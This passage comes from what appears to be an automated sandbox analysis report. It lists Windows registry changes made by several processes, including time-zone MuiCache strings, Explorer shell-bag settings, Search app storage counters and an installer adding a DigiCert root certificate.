Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" E35.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" E35.exe -
Modifies registry class 64 IoCs
Processes:
explorer.exeSearchApp.exeInstall.exechrome.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "115501" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "600" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "5752" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2247" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2247" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "187510" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mi = 2c0000000000000001000000ffffffffffffffffffffffffffffffff280000002000000058030000a1020000 Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3 Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\6 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Install.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "32882" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "11000" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "67446" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "68509" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "187510" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "67925" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "67925" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3\MRUListEx = ffffffff Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0400000003000000020000000100000000000000ffffffff Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2856" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "3743" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "35125" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "5388" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1752" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1752" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "77892" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "136017" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "196252" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2295526160-1155304984-640977766-1000\{201B5462-ABFE-45D8-8476-87C8AF20704C} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2894" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "11000" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "67446" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "64855" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "84200" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "171663" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "198788" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "228785" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "11806" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "11806" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "227720" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "29531" SearchApp.exe -
Processes:
kav21.3.10.391en_26075.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kav21.3.10.391en_26075.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kav21.3.10.391en_26075.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 kav21.3.10.391en_26075.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e63311930170603550